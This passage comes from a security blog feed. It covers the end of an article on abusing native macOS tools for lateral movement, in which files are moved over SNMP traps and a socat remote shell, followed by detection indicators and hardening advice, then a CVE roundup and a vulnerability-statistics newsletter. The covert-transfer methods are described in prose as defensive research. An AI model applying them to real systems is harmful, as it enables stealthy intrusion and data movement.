necessary&#xA0;<code>net-snmp</code>&#xA0;tools:&#xA0;<code>snmptrap</code>&#xA0;(&#x201C;/usr/bin/snmptrap&#x201D;) on the sender and&#xA0;<code>snmptrapd</code>&#xA0;(&#x201C;/usr/sbin/snmptrapd&#x201D;) on the&#xA0;receiver.&#xA0;</p><p>The approach works by&#xA0;Base64 encoding a file, splitting it into fixed-size chunks, and sending each chunk as an SNMP trap payload under a custom OID in the private enterprise space (&#x201C;1[.]3[.]6[.]1[.]4[.]1[.]99999&#x201D;). A trap handler on the receiving end reassembles the chunks and decodes the file. The protocol uses three message types:&#xA0;&#x201C;FILENAME&#x201D;&#xA0;signals the start of a&#xA0;transfer,&#xA0;&#x201C;DATA&#x201D;&#xA0;carries a&#xA0;Base64 chunk, and&#xA0;&#x201C;END&#x201D;&#xA0;triggers reassembly.&#xA0;</p><p>On the receiver, a trap handler processes incoming traps:</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-28.png" class="kg-image" alt="Bad Apples: Weaponizing native macOS primitives for movement and execution" loading="lazy" width="1750" height="1644" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/04/Figure-28.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/04/Figure-28.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/04/Figure-28.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-28.png 1750w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 28.&#xA0;SNMP&#xA0;trap&#xA0;handler&#xA0;logic.</span></figcaption></figure><p>The&#xA0;<code>snmptrapd</code>&#xA0;daemon is then configured on the target to route all incoming traps to the handler and started in the foreground:</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-29.png" class="kg-image" alt="Bad Apples: Weaponizing native macOS primitives for movement and execution" loading="lazy" width="1750" height="516" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/04/Figure-29.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/04/Figure-29.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/04/Figure-29.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-29.png 1750w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 29.&#xA0;Configuring the&#xA0;snmptrapd&#xA0;daemon.</span></figcaption></figure><p>On the sender, a script handles the encoding, chunking, and transmission. Each chunk is sent as a separate SNMP trap with a short delay between sends to avoid overwhelming the receiver:</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-30.png" class="kg-image" alt="Bad Apples: Weaponizing native macOS primitives for movement and execution" loading="lazy" width="1750" height="1482" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/04/Figure-30.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/04/Figure-30.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/04/Figure-30.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-30.png 1750w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 30.&#xA0;Script for SNMP&#xA0;chunking and&#xA0;transmission.&#xA0;</span></figcaption></figure><p>The sender&#xA0;initiates&#xA0;the transfer:&#xA0;</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-31.png" class="kg-image" alt="Bad Apples: Weaponizing native macOS primitives for movement and execution" loading="lazy" width="1750" height="596" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/04/Figure-31.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/04/Figure-31.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/04/Figure-31.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-31.png 1750w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 31.&#xA0;Initiating&#xA0;data&#xA0;transfer via SNMP&#xA0;traps.</span></figcaption></figure><p>The target receives the transfer:</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-32.png" class="kg-image" alt="Bad Apples: Weaponizing native macOS primitives for movement and execution" loading="lazy" width="1750" height="476" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/04/Figure-32.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/04/Figure-32.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/04/Figure-32.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-32.png 1750w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 32.&#xA0;Successful&#xA0;payload&#xA0;reassembly on&#xA0;target.</span></figcaption></figure><p>The matching MD5 hashes confirm the file was transferred and reassembled intact.&#xA0;</p><h3 id="socat-file-transfer">Socat&#xA0;file&#xA0;transfer&#xA0;</h3><p>The&#xA0;<code>socat</code>&#xA0;shell&#xA0;established&#xA0;in&#xA0;the&#xA0;above&#xA0;&quot;socat&#xA0;remote&#xA0;shell&#x201D; section&#xA0;can also serve as a file transfer channel. Because the listener provides a fully interactive&#xA0;bash session, file&#xA0;contents&#xA0;can be written to the remote host by injecting a heredoc through&#xA0;the connection. This means&#xA0;<code>socat</code>&#xA0;alone handles both remote command execution and tool transfer without requiring any&#xA0;additional&#xA0;services or listeners.&#xA0;</p><p>With the&#xA0;<code>socat</code>&#xA0;listener running on the target, the attacker delivers a file by piping a heredoc-wrapped&#xA0;<code>cat</code>&#xA0;command through a&#xA0;<code>socat</code>&#xA0;connection:</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-33.png" class="kg-image" alt="Bad Apples: Weaponizing native macOS primitives for movement and execution" loading="lazy" width="1750" height="758" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/04/Figure-33.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/04/Figure-33.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/04/Figure-33.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-33.png 1750w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 33.&#xA0;File&#xA0;delivery via&#xA0;socat&#xA0;heredoc&#xA0;injection.</span></figcaption></figure><h2 id="detection-and-defensive-considerations">Detection and&#xA0;defensive&#xA0;considerations&#xA0;</h2><p>Defending against&#xA0;LOTL&#xA0;techniques requires a shift from simple network alerts to granular process and metadata analysis.&#xA0;</p><h3 id="network-indicators">Network&#xA0;indicators&#xA0;</h3><p>Inbound TCP traffic on port 3031 (the&#xA0;&#x201C;eppc&#x201D;&#xA0;port) and unusual SNMP/TFTP traffic on internal LAN segments should be&#xA0;monitored&#xA0;for potential unauthorized activity.&#xA0;</p><h3 id="endpoint-indicators-evm">Endpoint&#xA0;indicators (EVM)&#xA0;</h3><p>Through mapping to the&#xA0;<a href="https://schema.ocsf.io/" rel="noreferrer noopener"><u>Open Cybersecurity Schema Framework (OCSF)</u></a>, an open-source effort to deliver a simplified and vendor-agnostic taxonomy for security telemetry, high-fidelity signatures for these behaviors were&#xA0;identified:&#xA0;</p><ul><li><strong>Suspicious</strong>&#xA0;<strong>lineage:</strong>&#xA0;Process trees following the pattern&#xA0;<code>launchd</code>&#xA0;-&gt;&#xA0;<code>AppleEventsD</code>&#xA0;-&gt;&#xA0;<code>Terminal</code>&#xA0;-&gt;&#xA0;<code>sh/bash</code>.&#xA0;</li><li><strong>Metadata</strong>&#xA0;<strong>monitoring:</strong>&#xA0;Frequent or unusual calls to&#xA0;<code>mdls</code>&#xA0;or writes to&#xA0;&#x201C;com.apple.metadata:kMDItemFinderComment&#x201D;.&#xA0;</li><li><strong>Command</strong>&#xA0;<strong>line</strong>&#xA0;<strong>anomalies:</strong>&#xA0;<code>base64 --decode</code>&#xA0;commands originating from GUI applications or&#xA0;<code>osascript</code>&#xA0;executions&#xA0;containing&#xA0;&#x201C;of&#xA0;machine &quot;eppc://...&quot;&#x201D;&#xA0;arguments.&#xA0;</li></ul><h3 id="native-security-controls-and-hardening-recommendations">Native&#xA0;security&#xA0;controls and&#xA0;hardening&#xA0;recommendations&#xA0;</h3><p>Several built-in macOS security mechanisms can be configured to mitigate the risks associated with native primitive abuse:&#xA0;</p><ul><li><strong>Transparency, Consent, and Control (TCC)</strong>&#xA0;<strong>restrictions:</strong>&#xA0;The &quot;Automation&quot; category within TCC is designed to regulate inter-application communication. By enforcing strict TCC policies via Mobile Device Management (MDM), unauthorized Apple Events between applications&#xA0;&#x2014;&#xA0;such as a script&#xA0;attempting&#xA0;to control&#xA0;&#x201C;Terminal.app&#x201D;&#xA0;or&#xA0;&#x201C;Finder&#x201D;&#xA0;&#x2014;&#xA0;can be blocked.&#xA0;</li><li><strong>MDM Policy Enforcement:</strong>&#xA0;RAS&#xA0;and Remote Login (SSH) should be disabled by default across the fleet. These services can be managed and restricted using MDM configuration profiles (e.g., the&#xA0;&#x201C;com.apple.RemoteAppleEvents&#x201D;payload) to ensure they are only active on authorized administrative hosts.&#xA0;</li><li><strong>Service</strong>&#xA0;<strong>hardening:</strong>&#xA0;Unnecessary network-facing services, such as&#xA0;<code>tftpd</code>&#xA0;and&#xA0;<code>snmpd</code>,&#xA0;should be explicitly disabled. The removal of these&#xA0;<code>launchd</code>&#xA0;plists&#xA0;from&#xA0;&#x201C;/System/Library/LaunchDaemons&#x201D;&#xA0;(where&#xA0;permitted&#xA0;by System Integrity Protection) or the use of&#xA0;<code>launchctl&#xA0;disable</code>&#xA0;commands&#xA0;prevents&#xA0;their use as ad-hoc data transfer channels.&#xA0;</li><li><strong>Application</strong>&#xA0;<strong>firewall</strong>&#xA0;<strong>and Stealth Mode:</strong>&#xA0;The built-in macOS application&#xA0;firewall&#xA0;should be enabled and configured in &quot;Stealth Mode.&quot; This configuration ensures the device does not respond to unsolicited ICMP or connection attempts on common ports, reducing the visibility of the endpoint during internal reconnaissance.&#xA0;</li></ul><h2 id="conclusion">Conclusion&#xA0;</h2><p>The research presented in this article underscores&#xA0;a fundamental&#xA0;reality of modern endpoint security. The same primitives designed for administrative convenience and system automation are often the most potent tools in an&#xA0;adversary&apos;s arsenal. By moving beyond traditional exploit-based attacks and instead&#xA0;LOTL,&#xA0;attackers can&#xA0;operate&#xA0;within the noise of legitimate system activity.</p><p>From the weaponization of the&#xA0;&#x201C;eppc&#x201D;&#xA0;protocol to the creative abuse of Spotlight metadata and SNMP traps, it is clear that the macOS attack surface is both vast and nuanced. These techniques&#xA0;demonstrate&#xA0;that even within a &quot;walled garden&quot; ecosystem, native pathways for movement and execution remain accessible to those who understand the underlying architecture.&#xA0;</p><p>For defenders, the primary takeaway is that visibility&#xA0;remains&#xA0;the most effective deterrent. By shifting focus from static file analysis to the monitoring of process lineage, inter-process communication, and metadata anomalies, these &quot;bad Apples&quot; can be&#xA0;identified&#xA0;and neutralized. As macOS continues its expansion into the enterprise core, the documentation and detection of these native techniques must remain a priority for the security community.&#xA0;</p>]]></content:encoded></item><item><title><![CDATA[Foxit, LibRaw vulnerabilities]]></title><description><![CDATA[<p>Cisco Talos&#x2019; Vulnerability Discovery &amp; Research team recently disclosed one Foxit Reader vulnerability, and six LibRaw file reader vulnerabilities.</p><p>The vulnerabilities mentioned in this blog post have been patched by their respective vendors, all in adherence to<a href="https://sec.cloudapps.cisco.com/security/center/resources/vendor_vulnerability_policy.html"> <u>Cisco&#x2019;s third-party vulnerability disclosure policy</u></a>.&#xA0;&#xA0;&#xA0;&#xA0;</p><p>For</p>]]></description><link>https://blog.talosintelligence.com/foxit-libraw-vulnerabilities/</link><guid isPermaLink="false">69dd0369ab91ce0001a70dc9</guid><category><![CDATA[Vulnerability Roundup]]></category><dc:creator><![CDATA[Kri Dontje]]></dc:creator><pubDate>Thu, 16 Apr 2026 19:00:24 GMT</pubDate><media:content url="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/vuln_roundup.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/vuln_roundup.jpg" alt="Foxit, LibRaw vulnerabilities"><p>Cisco Talos&#x2019; Vulnerability Discovery &amp; Research team recently disclosed one Foxit Reader vulnerability, and six LibRaw file reader vulnerabilities.</p><p>The vulnerabilities mentioned in this blog post have been patched by their respective vendors, all in adherence to<a href="https://sec.cloudapps.cisco.com/security/center/resources/vendor_vulnerability_policy.html"> <u>Cisco&#x2019;s third-party vulnerability disclosure policy</u></a>.&#xA0;&#xA0;&#xA0;&#xA0;</p><p>For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from<a href="https://snort.org/"> <u>Snort.org</u></a>, and our latest Vulnerability Advisories are always posted on<a href="https://talosintelligence.com/vulnerability_reports"> <u>Talos Intelligence&#x2019;s website</u></a>.</p><h2 id="foxit-use-after-free-vulnerability"><strong>Foxit use-after-free vulnerability</strong></h2><p><em>Discovered by KPC of Cisco Talos.</em></p><p>Foxit Reader allows users to view, edit, and sign PDF documents, among other features. Foxit aims to be one of the most feature-rich PDF readers on the market, and contains many similar functions to that of Adobe Acrobat Reader.</p><p><a href="https://talosintelligence.com/vulnerability_reports/TALOS-2026-2365" rel="noreferrer">TALOS-2026-2365</a> (CVE-2026-3779) is a use-after-free vulnerability in the way Foxit Reader handles an Array object. A specially crafted JavaScript code inside a malicious PDF document can trigger this vulnerability, which can lead to memory corruption and result in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability.</p><h2 id="libraw-heap-based-buffer-overflow-and-integer-overflow-vulnerabilities"><strong>LibRaw heap-based buffer overflow and integer overflow vulnerabilities</strong></h2><p><em>Discovered by Francesco Benvenuto of Cisco Talos.</em></p><p>LibRaw is a library and user interface for processing RAW file types and metadata created by digital cameras. Talos analysts found 6 vulnerabilities in LibRaw. </p><p><a href="https://talosintelligence.com/vulnerability_reports/TALOS-2026-2330" rel="noreferrer">TALOS-2026-2330</a> (CVE-2026-20911), <a href="https://talosintelligence.com/vulnerability_reports/TALOS-2026-2331" rel="noreferrer">TALOS-2026-2331</a> (CVE-2026-21413), <a href="https://talosintelligence.com/vulnerability_reports/TALOS-2026-2358" rel="noreferrer">TALOS-2026-2358</a> (CVE-2026-20889), and <a href="https://talosintelligence.com/vulnerability_reports/TALOS-2026-2359" rel="noreferrer">TALOS-2026-2359</a> (CVE-2026-24660) are heap-based buffer overflow vulnerabilities in LibRaw, and <a href="https://talosintelligence.com/vulnerability_reports/TALOS-2026-2363" rel="noreferrer">TALOS-2026-2363</a> (CVE-2026-24450) and <a href="https://talosintelligence.com/vulnerability_reports/TALOS-2026-2364" rel="noreferrer">TALOS-2026-2364</a> (CVE-2026-20884) are integer overflow vulnerabilities. Specially crafted malicious files can lead to heap buffer overflow in all cases. An attacker can provide a malicious file to trigger these vulnerabilities. </p>]]></content:encoded></item><item><title><![CDATA[The Q1 vulnerability pulse]]></title><description><![CDATA[Thor provides an overview of the Q1 2026 vulnerability statistics, highlighting key trends in legacy CVEs and the evolving impact of AI on the threat landscape.]]></description><link>https://blog.talosintelligence.com/the-q1-vulnerability-pulse/</link><guid isPermaLink="false">69dfae17645a220001422ae1</guid><category><![CDATA[Threat Source newsletter]]></category><dc:creator><![CDATA[Thorsten Rosendahl]]></dc:creator><pubDate>Thu, 16 Apr 2026 18:00:31 GMT</pubDate><media:content url="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/threat_source-2.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/threat_source-2.jpg" alt="The Q1 vulnerability pulse"><p>Welcome to this week&#x2019;s edition of the Threat Source newsletter.&#xA0;</p><p>The first quarter of 2026 passed faster than a misconfigured&#xA0;firewall&#xA0;rule gets exploited &#x2014; and the last few weeks have been firmly stamped with the &quot;software supply chain compromise&quot; label, with headlines surrounding incidents involving&#xA0;<a href="https://www.aquasec.com/blog/trivy-supply-chain-attack-what-you-need-to-know" rel="noreferrer noopener"><u>Trivy</u></a>,<a href="https://checkmarx.com/blog/checkmarx-security-update" rel="noreferrer noopener"><u>Checkmark</u></a>,&#xA0;<a href="https://lwn.net/Articles/1064479/" rel="noreferrer noopener"><u>LiteLLM</u></a>,&#xA0;<a href="https://research.jfrog.com/post/team-pcp-strikes-again-telnyx-popular-library-hit/" rel="noreferrer noopener"><u>telnyx</u></a>&#xA0;and&#xA0;<a href="https://www.stepsecurity.io/blog/axios-compromised-on-npm-malicious-versions-drop-remote-access-trojan" rel="noreferrer noopener"><u>axios</u></a>. This edition stays focused on vulnerability statistics, although you can view&#xA0;<a href="https://blog.talosintelligence.com/protecting-supply-chain-2026/" rel="noreferrer noopener"><u>Dave</u></a>&#xA0;and&#xA0;<a href="https://blog.talosintelligence.com/axois-npm-supply-chain-incident/" rel="noreferrer noopener"><u>Nick&apos;s</u></a>&#xA0;Talos blogs for more information about these incidents.&#xA0;</p><p>Known Exploited Vulnerabilities (KEVs) stayed&#xA0;roughly in&#xA0;line with 2025 numbers &#x2014; no dramatic spike, but no room for relief either.</p><figure class="kg-card kg-image-card"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/041526_threatsource_blog_KEVline.jpg" class="kg-image" alt="The Q1 vulnerability pulse" loading="lazy" width="1792" height="1056" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/04/041526_threatsource_blog_KEVline.jpg 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/04/041526_threatsource_blog_KEVline.jpg 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/04/041526_threatsource_blog_KEVline.jpg 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/041526_threatsource_blog_KEVline.jpg 1792w" sizes="(min-width: 720px) 720px"></figure><p>What&#xA0;<em>does</em>&#xA0;stand out? Networking gear accounted for 20% of KEV-related vulnerabilities, and that number is expected to climb as the year progresses. If the trend from 2025 holds, this&#xA0;won&apos;t&#xA0;be the high-water mark.</p><figure class="kg-card kg-image-card"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/041526_threatsource_blog_pie.jpg" class="kg-image" alt="The Q1 vulnerability pulse" loading="lazy" width="1792" height="710" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/04/041526_threatsource_blog_pie.jpg 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/04/041526_threatsource_blog_pie.jpg 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/04/041526_threatsource_blog_pie.jpg 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/041526_threatsource_blog_pie.jpg 1792w" sizes="(min-width: 720px) 720px"></figure><p>Patch management&#xA0;remains&#xA0;one of the industry&apos;s most persistent challenges, and I understand all the operational complexity that comes with it. That said, it still stings to come across CVEs with disclosure dates reaching back to 2009 &#x2014; and&#xA0;roughly 25%&#xA0;of the CVEs&#xA0;we&apos;re&#xA0;tracking date to 2024 or earlier. Old vulnerabilities&#xA0;don&apos;t&#xA0;retire. They wait. It starts with visibility: Knowing&#xA0;what&apos;s&#xA0;actually running&#xA0;in your environment is the prerequisite for everything else.</p><figure class="kg-card kg-image-card"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/041526_threatsource_blog_CVEline.jpg" class="kg-image" alt="The Q1 vulnerability pulse" loading="lazy" width="1792" height="1056" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/04/041526_threatsource_blog_CVEline.jpg 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/04/041526_threatsource_blog_CVEline.jpg 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/04/041526_threatsource_blog_CVEline.jpg 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/041526_threatsource_blog_CVEline.jpg 1792w" sizes="(min-width: 720px) 720px"></figure><p>Overall CVE counts increased in Q1, with March showing the sharpest climb. Whether that reflects improved disclosure pipelines, increased researcher activity,&#xA0;ora&#xA0;genuine uptick in vulnerability density, the trend line from 2025&#xA0;hasn&apos;t&#xA0;flattened &#x2014; if anything,&#xA0;it&apos;s&#xA0;still pointing up.&#xA0;</p><p>Using the keyword&#xA0;methodology&#xA0;described&#xA0;<a href="https://blog.talosintelligence.com/patch-track-repeat-the-2025-cve-retrospective/" rel="noreferrer noopener"><u>here</u></a>, 121 CVEs with AI relevance were&#xA0;identified&#xA0;in Q1 &#x2014; more than Q1 2025, though consistent with what adoption trends would predict. As AI components become more deeply embedded across the software stack, this number will keep climbing.&#xA0;</p><p>Given the recent developments with models like&#xA0;the&#xA0;Mythos&#xA0;preview and the industry teaming up in initiatives like&#xA0;<a href="https://www.anthropic.com/glasswing" rel="noreferrer noopener"><u>Project Glasswing</u></a>,&#xA0;I&apos;m&#xA0;curious how the trajectory will change moving forward. If you&#xA0;haven&apos;t&#xA0;read about it:&#xA0;</p><p><em>&#x201C;During our testing, we found that Mythos Preview is capable of identifying and then exploiting zero-day vulnerabilities in every major operating system and every major web browser when directed by a user to do so.&#x201D; -</em>&#xA0;<a href="https://red.anthropic.com/2026/mythos-preview/" rel="noreferrer noopener"><em><u>Anthropic Frontier Red Team</u></em></a></p><p>That&apos;s&#xA0;a substantial capability&#xA0;jump&#xA0;in agentic coding and reasoning, which eventually needs to be implemented early in the development lifecycle. And as&#xA0;<a href="https://blogs.cisco.com/news/rising-to-the-era-of-ai-powered-cyber-defense" rel="noreferrer noopener"><u>Anthony</u></a>&#xA0;points&#xA0;out,&#xA0;those&#xA0;capabilities will become available to adversaries. Read <a href="https://www.cisco.com/c/dam/en_us/about/doing_business/trust-center/docs/cisco-defending-against-ai-attacks-guidance.pdf" rel="noreferrer">Cisco&apos;s guidance</a> on defending in the age of AI-enabled attacks for more.</p><p>Will we see fewer CVEs or even more negative times-to-exploit (TTEs)?&#xA0;</p><p>It&apos;s&#xA0;on us. Defenders need to get ahead of the adversaries, and at the same time, we need to pay attention to (sometimes decade-old) vulnerabilities.</p><h2 id="the-one-big-thing">The one&#xA0;big thing&#xA0;</h2><p>Cisco Talos has&#xA0;<a href="https://blog.talosintelligence.com/the-n8n-n8mare/" rel="noreferrer noopener"><u>identified</u>&#xA0;<u>a significant increase</u></a>&#xA0;in the abuse of n8n, an AI workflow automation platform, to&#xA0;facilitate&#xA0;malicious campaigns including malware delivery and device fingerprinting. Attackers are weaponizing the platform&#x2019;s URL-exposed webhooks to create phishing lures that bypass traditional security filters by&#xA0;leveraging&#xA0;trusted, legitimate infrastructure. By masking malicious payloads as standard data streams, these campaigns effectively turn productivity tools into delivery vehicles for remote access trojans and other cyber threats.&#xA0;</p><h3 id="why-do-i-care">Why do I care?&#xA0;</h3><p>The abuse of legitimate automation platforms exploits the inherent trust organizations&#xA0;place&#xA0;in these tools, which often neutralizes traditional perimeter-based security defenses. Because these platforms are designed for flexibility and seamless integration, they allow attackers to dynamically tailor payloads and evade detection through standard reputation-based filtering.&#xA0;</p><h3 id="so-now-what">So now what?&#xA0;</h3><p>Move beyond static domain blocking and implement behavioral detection that&#xA0;alerts on&#xA0;anomalous traffic patterns directed toward automation platforms. Restrict endpoint communication with these services to only those explicitly authorized by the organization&#x2019;s established internal workflows. Finally,&#xA0;utilize&#xA0;AI-driven email security solutions to analyze the semantic intent of incoming messages and proactively share indicators of compromise, such as specific webhook structures, with threat intelligence communities.&#xA0;</p><h2 id="top-security-headlines-of-the-week">Top security headlines of the week&#xA0;</h2><p><strong>Adobe</strong>&#xA0;<strong>patches</strong>&#xA0;<strong>actively</strong>&#xA0;<strong>exploited</strong>&#xA0;<strong>zero-day</strong>&#xA0;<strong>that</strong>&#xA0;<strong>lingered for</strong>&#xA0;<strong>months</strong>&#xA0;<br>Adobe patched an arbitrary code execution vulnerability in the latest versions of its Acrobat and Reader for Windows and macOS,&#xA0;nearly four&#xA0;months after an attacker first appeared to have begun exploiting it. (<a href="https://www.darkreading.com/application-security/adobe-patches-actively-exploited-zero-day" rel="noreferrer noopener"><u>Dark Reading</u></a>)&#xA0;</p><p><strong>Fake Claude website distributes</strong>&#xA0;<strong>PlugX</strong>&#xA0;<strong>RAT</strong>&#xA0;<br>A threat actor created a site that hosts a download link pointing to a ZIP archive allegedly&#xA0;containing&#xA0;a pro version of the LLM.&#xA0;(<a href="https://www.securityweek.com/fake-claude-website-distributes-plugx-rat/" rel="noreferrer noopener"><u>SecurityWeek</u></a>)&#xA0;</p><p><strong>Sweden blames Russian hackers for attempting &#x201C;destructive&#x201D;</strong>&#xA0;<strong>cyber attack</strong>&#xA0;<strong>on thermal plant</strong>&#xA0;<br>Sweden&#x2019;s minister of civil defense said during a press conference on Wednesday that the attempted attack happened in early 2025 and attributed the incident to hackers with &#x201C;connections to Russian intelligence and security services.&#x201D; (<a href="https://techcrunch.com/2026/04/15/sweden-blames-russian-hackers-for-attempting-destructive-cyberattack-on-thermal-plant/" rel="noreferrer noopener"><u>TechCrunch</u></a>)&#xA0;</p><p><strong>FBI and Indonesian police dismantle W3LL phishing network behind $20M fraud attempts</strong>&#xA0;<br>The W3LL phishing kit, advertised for a fee of about $500, allowed criminals to mimic legitimate login pages to deceive victims into handing over their credentials, allowing the attackers to seize control of their accounts. (<a href="https://thehackernews.com/2026/04/fbi-and-indonesian-police-dismantle.html" rel="noreferrer noopener"><u>The Hacker News</u></a>)&#xA0;</p><p><strong>Google API keys in Android apps expose Gemini endpoints to unauthorized access</strong>&#xA0;<br>Armed with the key, an attacker could access private files and cached content, make arbitrary Gemini API calls, exhaust API&#xA0;quotas&#xA0;and disrupt legitimate services, and access any data on Gemini&#x2019;s file storage. (<a href="https://www.securityweek.com/google-api-keys-in-android-apps-expose-gemini-endpoints-to-unauthorized-access/?utm_source=tldrinfosec" rel="noreferrer noopener"><u>SecurityWeek</u></a>)&#xA0;</p><h2 id="can%E2%80%99t-get-enough-talos">Can&#x2019;t&#xA0;get enough Talos?&#xA0;</h2><p><a href="https://blog.talosintelligence.com/more-than-pretty-pictures-wendy-bishop-on-visual-storytelling-in-tech" rel="noreferrer noopener"><strong><u>More than pretty pictures: Wendy Bishop on visual storytelling in tech</u></strong></a>&#xA0;<br>From her early beginnings in web design and journalism to leading the creative vision for Talos, Wendy talks about the unique challenges and rewards of bridging the gap between artistic expression and highly technical research.&#xA0;</p><p><a href="https://blog.talosintelligence.com/powmix-botnet-targets-czech-workforce" rel="noreferrer noopener"><strong><u>PowMix botnet targets Czech workforce</u></strong></a>&#xA0;<br>Cisco Talos discovered an ongoing malicious campaign affecting Czech workers with a previously undocumented botnet we call &#x201C;PowMix.&#x201D; It&#xA0;employs&#xA0;random beaconing intervals to evade the&#xA0;network&#xA0;signature detections.&#xA0;</p><p><a href="https://blog.talosintelligence.com/state-sponsored-threats-different-objectives-similar-access-paths/" rel="noreferrer noopener"><strong><u>APTs: 